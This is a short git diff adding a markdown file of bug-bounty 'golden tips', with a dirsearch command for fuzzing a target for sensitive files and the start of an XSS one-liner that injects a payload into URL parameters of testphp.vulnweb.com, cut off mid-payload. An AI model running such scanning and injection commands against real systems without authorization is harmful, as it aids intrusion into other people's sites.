diff --git a/writeups.md b/writeups.md new file mode 100644 index 0000000..a62b8a5 --- /dev/null +++ b/writeups.md @@ -0,0 +1,29 @@ +# Writeups (Golden tips) + +## Information Disclosure +```bash +# directory fuzzing for sensitive files +dirsearch -u “https://target.com” -t 150 -x 403,404,500,429 -i 200,301,302 --random-agent +``` +## Reflected XSS (Non-Persistent XSS) +```bash +# XSS one liner +echo "testphp.vulnweb.com" | gauplus | grep "?" | qsreplace 'xssz">